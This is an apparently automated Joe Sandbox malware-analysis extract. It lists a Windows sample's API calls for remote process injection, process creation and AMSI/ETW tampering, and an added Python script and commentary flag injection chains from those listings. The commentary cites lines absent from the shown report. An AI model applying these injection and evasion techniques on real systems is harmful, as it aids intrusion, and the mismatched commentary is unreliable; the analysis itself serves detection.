38557->38561 38564 28a7e04 38558->38564 38562 28847ec 11 API calls 38559->38562 38563 28847ec 11 API calls 38560->38563 38566 28a9f8d 38561->38566 38568 28a97e2 38562->38568 38569 28a89e8 38563->38569 38565 28989d0 20 API calls 38564->38565 38567 28a7e28 38565->38567 38570 28989d0 20 API calls 38566->38570 38571 2895aec 42 API calls 38567->38571 38572 28989d0 20 API calls 38568->38572 38574 28989d0 20 API calls 38569->38574 38573 28a9fb1 38570->38573 38575 28a7e54 38571->38575 38576 28a9806 38572->38576 38577 2884860 11 API calls 38573->38577 38578 28a8a0c 38574->38578 38584 2884bcc 11 API calls 38575->38584 38579 2887e5c GetFileAttributesA 38576->38579 38588 28a9fd2 38577->38588 39058 289d164 23 API calls 38578->39058 38581 28a9810 38579->38581 38585 28a9818 38581->38585 38586 28a9aef 38581->38586 38582 28a8a20 38583 2884860 11 API calls 38582->38583 38593 28a8a46 38583->38593 38589 28a7e69 38584->38589 38590 2884860 11 API calls 38585->38590 38587 2884860 11 API calls 38586->38587 38595 28a9b10 38587->38595 38592 28847ec 11 API calls 38588->38592 38591 2884860 11 API calls 38589->38591 38594 28a9839 38590->38594 38596 28a7e8a 38591->38596 38600 28aa009 38592->38600 38597 28847ec 11 API calls 38593->38597 38598 28847ec 11 API calls 38594->38598 38599 28847ec 11 API calls 38595->38599 38601 28847ec 11 API calls 38596->38601 38604 28a8a7d 38597->38604 38605 28a9870 38598->38605 38606 28a9b47 38599->38606 38602 28989d0 20 API calls 38600->38602 38608 28a7ec1 38601->38608 38603 28aa02d 38602->38603 38607 2884860 11 API calls 38603->38607 38609 28989d0 20 API calls 38604->38609 38610 28989d0 20 API calls 38605->38610 38611 28989d0 20 API calls 38606->38611 38620 28aa04e 38607->38620 38613 28989d0 20 API calls 38608->38613 38612 28a8aa1 38609->38612 38614 28a9894 38610->38614 38615 28a9b6b 38611->38615 38616 2884860 11 API calls 38612->38616 38617 28a7ee5 38613->38617 38618 2884860 11 API calls 38614->38618 38619 2884860 11 API calls 38615->38619 38622 28a8ac2 
38616->38622 38623 28849f8 11 API calls 38617->38623 38624 28a98b5 38618->38624 38625 28a9b8c 38619->38625 38621 28847ec 11 API calls 38620->38621 38632 28aa085 38621->38632 38628 28847ec 11 API calls 38622->38628 38626 28a7f02 38623->38626 38630 28847ec 11 API calls 38624->38630 38631 28847ec 11 API calls 38625->38631 38627 2897e50 18 API calls 38626->38627 38629 28a7f08 38627->38629 38635 28a8af9 38628->38635 38633 2884860 11 API calls 38629->38633 38636 28a98ec 38630->38636 38637 28a9bc3 38631->38637 38634 28989d0 20 API calls 38632->38634 38638 28a7f29 38633->38638 38642 28aa0a9 38634->38642 38639 28989d0 20 API calls 38635->38639 38640 28989d0 20 API calls 38636->38640 38641 28989d0 20 API calls 38637->38641 38644 28847ec 11 API calls 38638->38644 38643 28a8b1d 38639->38643 38645 28a9910 38640->38645 38646 28a9be7 38641->38646 38650 28989d0 20 API calls 38642->38650 38647 2884860 11 API calls 38643->38647 38652 28a7f60 38644->38652 38648 2884860 11 API calls 38645->38648 38649 2884860 11 API calls 38646->38649 38651 28a8b3e 38647->38651 38655 28a9931 38648->38655 38653 28a9c08 38649->38653 38654 28aa0dc 38650->38654 38656 28847ec 11 API calls 38651->38656 38657 28989d0 20 API calls 38652->38657 38659 28847ec 11 API calls 38653->38659 38660 28989d0 20 API calls 38654->38660 38658 28847ec 11 API calls 38655->38658 38663 28a8b75 38656->38663 38661 28a7f84 38657->38661 38664 28a9968 38658->38664 38665 28a9c3f 38659->38665 38666 28aa10f 38660->38666 38662 2884860 11 API calls 38661->38662 38667 28a7fa5 38662->38667 38668 28989d0 20 API calls 38663->38668 38669 28989d0 20 API calls 38664->38669 38670 28989d0 20 API calls 38665->38670 38671 28989d0 20 API calls 38666->38671 38673 28847ec 11 API calls 38667->38673 38672 28a8b99 38668->38672 38674 28a998c 38669->38674 38675 28a9c63 38670->38675 38684 28aa142 38671->38684 38676 28a8bb9 38672->38676 38677 28a8ba2 38672->38677 38685 28a7fdc 38673->38685 38678 289e358 11 API calls 38674->38678 38679 2884860 11 API calls 
38675->38679 38681 2884860 11 API calls 38676->38681 39059 2898730 17 API calls 38677->39059 38682 28a99a1 38678->38682 38689 28a9c84 38679->38689 38687 28a8bda 38681->38687 38683 2884530 11 API calls 38682->38683 38686 28a99b1 38683->38686 38690 28989d0 20 API calls 38684->38690 38691 28989d0 20 API calls 38685->38691 38688 2884860 11 API calls 38686->38688 38693 28847ec 11 API calls 38687->38693 38696 28a99d2 38688->38696 38692 28847ec 11 API calls 38689->38692 38697 28aa175 38690->38697 38694 28a8000 38691->38694 38699 28a9cbb 38692->38699 38701 28a8c11 38693->38701 38695 2884860 11 API calls 38694->38695 38702 28a8021 38695->38702 38698 28847ec 11 API calls 38696->38698 38700 28989d0 20 API calls 38697->38700 38710 28a9a09 38698->38710 38704 28989d0 20 API calls 38699->38704 38703 28aa1a8 38700->38703 38706 28989d0 20 API calls 38701->38706 38707 28847ec 11 API calls 38702->38707 38705 2884860 11 API calls 38703->38705 38708 28a9cdf 38704->38708 38716 28aa1c9 38705->38716 38709 28a8c35 38706->38709 38717 28a8058 38707->38717 38711 28849f8 11 API calls 38708->38711 38712 2884860 11 API calls 38709->38712 38714 28989d0 20 API calls 38710->38714 38713 28a9ce9 38711->38713 38721 28a8c56 38712->38721 39060 2898d70 31 API calls 38713->39060 38718 28a9a2d 38714->38718 38720 28847ec 11 API calls 38716->38720 38722 28989d0 20 API calls 38717->38722 38719 2884860 11 API calls 38718->38719 38727 28a9a4e 38719->38727 38726 28aa200 38720->38726 38723 28847ec 11 API calls 38721->38723 38724 28a807c 38722->38724 38730 28a8c8d 38723->38730 38725 2884860 11 API calls 38724->38725 38731 28a809d 38725->38731 38729 28989d0 20 API calls 38726->38729 38728 28847ec 11 API calls 38727->38728 38737 28a9a85 38728->38737 38732 28aa224 38729->38732 38734 28989d0 20 API calls 38730->38734 38735 28847ec 11 API calls 38731->38735 38733 2884860 11 API calls 38732->38733 38740 28aa245 38733->38740 38736 28a8cb1 38734->38736 38741 28a80d4 38735->38741 38738 2884860 11 API calls 38736->38738 
38739 28989d0 20 API calls 38737->38739 38743 28a8cd2 38738->38743 38749 28a9aa9 38739->38749 38742 28847ec 11 API calls 38740->38742 38744 28989d0 20 API calls 38741->38744 38748 28aa27c 38742->38748 38746 28847ec 11 API calls 38743->38746 38745 28a80f8 38744->38745 38747 289b118 43 API calls 38745->38747 38751 28a8d09 38746->38751 38753 28a8109 38747->38753 38750 28989d0 20 API calls 38748->38750 38752 289dc8c 17 API calls 38749->38752 38756 28aa2a0 38750->38756 38754 28989d0 20 API calls 38751->38754 38752->38586 38755 28a8d2d ResumeThread 38754->38755 38757 2884860 11 API calls 38755->38757 38758 28989d0 20 API calls 38756->38758 38761 28a8d59 38757->38761 38759 28aa2d3 38758->38759 38760 2884860 11 API calls 38759->38760 38763 28aa2f4 38760->38763 38762 28847ec 11 API calls 38761->38762 38764 28a8d90 38762->38764 38765 28847ec 11 API calls 38763->38765 38766 28989d0 20 API calls 38764->38766 38768 28aa32b 38765->38768 38767 28a8db4 38766->38767 38769 2884860 11 API calls 38767->38769 38770 28989d0 20 API calls 38768->38770 38773 28a8dd5 38769->38773 38771 28aa34f 38770->38771 38772 2884860 11 API calls 38771->38772 38775 28aa370 38772->38775 38774 28847ec 11 API calls 38773->38774 38777 28a8e0c 38774->38777 38776 28847ec 11 API calls 38775->38776 38780 28aa3a7 38776->38780 38778 28989d0 20 API calls 38777->38778 38779 28a8e30 38778->38779 38781 2884860 11 API calls 38779->38781 38782 28989d0 20 API calls 38780->38782 38785 28a8e51 38781->38785 38783 28aa3cb 38782->38783 38784 2884860 11 API calls 38783->38784 38787 28aa3ec 38784->38787 38786 28847ec 11 API calls 38785->38786 38789 28a8e88 38786->38789 38788 28847ec 11 API calls 38787->38788 38793 28aa423 38788->38793 38790 28989d0 20 API calls 38789->38790 38791 28a8eac CloseHandle 38790->38791 38792 2884860 11 API calls 38791->38792 38795 28a8ed8 38792->38795 38794 28989d0 20 API calls 38793->38794 38796 28aa447 38794->38796 38797 28847ec 11 API calls 38795->38797 38798 28989d0 20 API calls 38796->38798 38799 
28a8f0f 38797->38799 38800 28aa47a 38798->38800 38801 28989d0 20 API calls 38799->38801 38803 28989d0 20 API calls 38800->38803 38802 28a8f33 38801->38802 38804 2884860 11 API calls 38802->38804 38805 28aa4ad 38803->38805 38806 28a8f54 38804->38806 38807 28989d0 20 API calls 38805->38807 38808 28847ec 11 API calls 38806->38808 38809 28aa4e0 38807->38809 38810 28a8f8b 38808->38810 38811 28989d0 20 API calls 38809->38811 38812 28989d0 20 API calls 38810->38812 38813 28aa513 38811->38813 38814 28a8faf 38812->38814 38815 2884860 11 API calls 38813->38815 38816 2884860 11 API calls 38814->38816 38818 28aa534 38815->38818 38817 28a8fd0 38816->38817 38820 28847ec 11 API calls 38817->38820 38819 28847ec 11 API calls 38818->38819 38821 28aa56b 38819->38821 38822 28a9007 38820->38822 38823 28989d0 20 API calls 38821->38823 38824 28989d0 20 API calls 38822->38824 38825 28aa58f 38823->38825 38826 28a902b 38824->38826 38827 2884860 11 API calls 38825->38827 38828 2884860 11 API calls 38826->38828 38829 28aa5b0 38827->38829 38830 28a904c 38828->38830 38832 28847ec 11 API calls 38829->38832 38831 28847ec 11 API calls 38830->38831 38834 28a9083 38831->38834 38833 28aa5e7 38832->38833 38835 28989d0 20 API calls 38833->38835 38836 28989d0 20 API calls 38834->38836 38839 28aa60b 38835->38839 38837 28a90a7 38836->38837 38838 2884860 11 API calls 38837->38838 38841 28a90c8 38838->38841 38840 28989d0 20 API calls 38839->38840 38843 28aa63e 38840->38843 38842 28847ec 11 API calls 38841->38842 38845 28a90ff 38842->38845 38844 28989d0 20 API calls 38843->38844 38848 28aa671 38844->38848 38846 28989d0 20 API calls 38845->38846 38847 28a9123 38846->38847 38849 2884860 11 API calls 38847->38849 38850 28989d0 20 API calls 38848->38850 38851 28a9144 38849->38851 38852 28aa6a4 38850->38852 38853 28847ec 11 API calls 38851->38853 38854 28989d0 20 API calls 38852->38854 38855 28a917b 38853->38855 38856 28aa6d7 38854->38856 38857 28989d0 20 API calls 38855->38857 38859 28989d0 20 API calls 

                                                                            Control-flow Graph (function at 028A8128; the graph rendering with its Executed / Not Executed legend is not included in this extract)
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029FB7E0,029FB824,OpenSession,02907380,028AB7B8,UacScan,02907380), ref: 028A86E9
                                                                            • ResumeThread.KERNEL32(00000000,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8), ref: 028A8D33
                                                                            • CloseHandle.KERNEL32(00000000,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380,028AB7B8,00000000,ScanBuffer,02907380,028AB7B8,OpenSession,02907380), ref: 028A8EB2
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02907380,028AB7B8,UacInitialize,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,UacScan,02907380), ref: 028A92A4
                                                                              • Part of subcall function 02887E5C: GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                              • Part of subcall function 0289DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DD5E), ref: 0289DCCB
                                                                              • Part of subcall function 0289DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0289DD05
                                                                              • Part of subcall function 0289DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0289DD32
                                                                              • Part of subcall function 0289DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0289DD3B
                                                                              • Part of subcall function 02898338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
                                                                            • ExitProcess.KERNEL32(00000000,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,Initialize,02907380,028AB7B8,00000000,00000000,00000000,ScanString,02907380,028AB7B8), ref: 028AB2FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery

                                                                            Control-flow Graph (function at 0289B118; the graph rendering with its Executed / Not Executed legend is not included in this extract)
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                            • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02907380,0289CFC0,ScanString,02907380,0289CFC0,ScanBuffer,02907380,0289CFC0,ScanString,02907380,0289CFC0,UacScan,02907380), ref: 0289B3EA
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtOpenProcess.NTDLL(02907584,001F0FFF,02907318,02907330), ref: 0289B4E8
                                                                              • Part of subcall function 02882EE0: QueryPerformanceCounter.KERNEL32 ref: 02882EE4
                                                                              • Part of subcall function 02897A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            • IsBadReadPtr.KERNEL32(0E960000,00000040), ref: 0289B95F
                                                                            • IsBadReadPtr.KERNEL32(?,000000F8), ref: 0289B98C
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02907380,0289CFC0,ScanString,02907380,0289CFC0,06700000,06700000,0EB90000,18C157FD,02907588,OpenSession,02907380,0289CFC0), ref: 0289C807
                                                                            • NtCreateThreadEx.NTDLL(02907560,02000000,02907318,06701617,06701617,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02907380,0289CFC0,UacInitialize,02907380), ref: 0289CA18
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                            • API String ID: 341001173-1870492900
                                                                            • Opcode ID: 512123d5e9c728dc6001291f76614515c6e9255a71aad4c67086edffa5c42187
                                                                            • Instruction ID: 262467d69bb8f01826b5b8d36a1c5ce8dd7d022b5095aa853ee8fc923dc41684
                                                                            • Opcode Fuzzy Hash: 512123d5e9c728dc6001291f76614515c6e9255a71aad4c67086edffa5c42187
                                                                            • Instruction Fuzzy Hash: 14F2EE3EB4411A9FDF51FB68DC80BDE73B6AF85300F5440A2A008EB615DA71AE46CF56
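The function above resolves NtCreateThreadEx out of ntdll by name at runtime and, through subcall 0289894C / 02897D78, pairs it with NtWriteVirtualMemory; the matching allocation primitive (NtAllocateVirtualMemory, ref 02897A9F) appears in a separate function entry further down this listing. Together those three calls are the remote-injection chain behind the report's "Allocates memory in foreign processes" and "Creates a thread in another existing process" signatures. The script below is an added example, not Joe Sandbox code: it parses lines in the report's "• Api.MODULE(args), ref: ADDR" shape (including "Part of subcall function" lines), collects names resolved through GetProcAddress, and reports whether the allocate/write/execute chain and any anti-debug check are present. The category sets are an assumption chosen for illustration, and the sample lines are copied from function entries on this page.

```python
"""Parse Joe Sandbox per-function API listings and flag an injection chain.

Added example for this report page; not Joe Sandbox code. It assumes the
listing's line shape "• Api.MODULE(args), ref: ADDR", optionally prefixed
by "Part of subcall function XXXX:". The category sets below are an
assumption chosen for illustration, not a Joe Sandbox signature definition.
"""
import re

# One API line from a Joe Sandbox "APIs" block.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Primitive groups that together form the classic remote-injection chain
# (allocate in target -> write payload -> start a thread on it).
INJECTION_STEPS = {
    "allocate": {"NtAllocateVirtualMemory", "ZwAllocateVirtualMemory", "VirtualAllocEx"},
    "write": {"NtWriteVirtualMemory", "ZwWriteVirtualMemory", "WriteProcessMemory"},
    "execute": {"NtCreateThreadEx", "ZwCreateThreadEx", "CreateRemoteThread", "RtlCreateUserThread"},
}
ANTI_DEBUG = {"CheckRemoteDebuggerPresent", "IsDebuggerPresent", "NtQueryInformationProcess"}

# Constructed sample: lines copied from several function entries in this report.
SAMPLE_REPORT_LINES = """
• GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02907380,0289CFC0,ScanString,02907380,0289CFC0,06700000,06700000,0EB90000,18C157FD,02907588,OpenSession,02907380,0289CFC0), ref: 0289C807
• NtCreateThreadEx.NTDLL(02907560,02000000,02907318,06701617,06701617,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02907380,0289CFC0,UacInitialize,02907380), ref: 0289CA18
  • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
  • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
  • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
  • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0289F766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0289F77D
"""


def parse_api_lines(text):
    """Return one dict per API line; lines that do not match the shape are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),   # None when the function calls the API directly
        })
    return calls


def classify(calls):
    """Summarise which injection primitives and anti-debug checks the listing shows."""
    direct = {c["api"] for c in calls}
    # GetProcAddress(hModule, "Name"): the resolved name is the second argument.
    resolved = {c["args"][1] for c in calls
                if c["api"] == "GetProcAddress" and len(c["args"]) > 1}
    effective = direct | resolved
    steps = {step for step, names in INJECTION_STEPS.items() if effective & names}
    # Where each step was first observed, for the analyst's notes.
    first_ref = {}
    for c in calls:
        for step, names in INJECTION_STEPS.items():
            if c["api"] in names and step not in first_ref:
                first_ref[step] = f"{c['ref']:08X}"
    return {
        "injection_steps": sorted(steps),
        "injection_chain_complete": steps == set(INJECTION_STEPS),
        "first_ref": first_ref,
        "anti_debug": sorted(effective & ANTI_DEBUG),
        "dynamically_resolved": sorted(resolved),
    }


if __name__ == "__main__":
    for key, value in classify(parse_api_lines(SAMPLE_REPORT_LINES)).items():
        print(f"{key}: {value}")
```

Names pulled from GetProcAddress arguments count as "effective" calls because a loader that resolves an API by hand never shows it in the import table; the same trick is why the report lists CheckRemoteDebuggerPresent under both GetProcAddress and a direct call. The trailing stack-residue arguments on each line (the UacScan/ScanString strings) are ignored by the parser except for the GetProcAddress name slot.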

                                                                            Control-flow Graph

                                                                            control_flow_graph 10172 2885acc-2885b0d GetModuleFileNameA RegOpenKeyExA 10173 2885b4f-2885b92 call 2885908 RegQueryValueExA 10172->10173 10174 2885b0f-2885b2b RegOpenKeyExA 10172->10174 10179 2885b94-2885bb0 RegQueryValueExA 10173->10179 10180 2885bb6-2885bd0 RegCloseKey 10173->10180 10174->10173 10175 2885b2d-2885b49 RegOpenKeyExA 10174->10175 10175->10173 10177 2885bd8-2885c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10175->10177 10181 2885c0f-2885c13 10177->10181 10182 2885cf2-2885cf9 10177->10182 10179->10180 10183 2885bb2 10179->10183 10185 2885c1f-2885c35 lstrlenA 10181->10185 10186 2885c15-2885c19 10181->10186 10183->10180 10187 2885c38-2885c3b 10185->10187 10186->10182 10186->10185 10188 2885c3d-2885c45 10187->10188 10189 2885c47-2885c4f 10187->10189 10188->10189 10190 2885c37 10188->10190 10189->10182 10191 2885c55-2885c5a 10189->10191 10190->10187 10192 2885c5c-2885c82 lstrcpynA LoadLibraryExA 10191->10192 10193 2885c84-2885c86 10191->10193 10192->10193 10193->10182 10194 2885c88-2885c8c 10193->10194 10194->10182 10195 2885c8e-2885cbe lstrcpynA LoadLibraryExA 10194->10195 10195->10182 10196 2885cc0-2885cf0 lstrcpynA LoadLibraryExA 10195->10196 10196->10182
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02880000,028AE790), ref: 02885AE8
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B06
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B24
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885B42
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885B8B
                                                                            • RegQueryValueExA.ADVAPI32(?,02885D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001), ref: 02885BA9
                                                                            • RegCloseKey.ADVAPI32(?,02885BD8,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885BCB
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885BE8
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02885BF5
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02885BFB
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02885C26
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885C6D
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885C7D
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885CA5
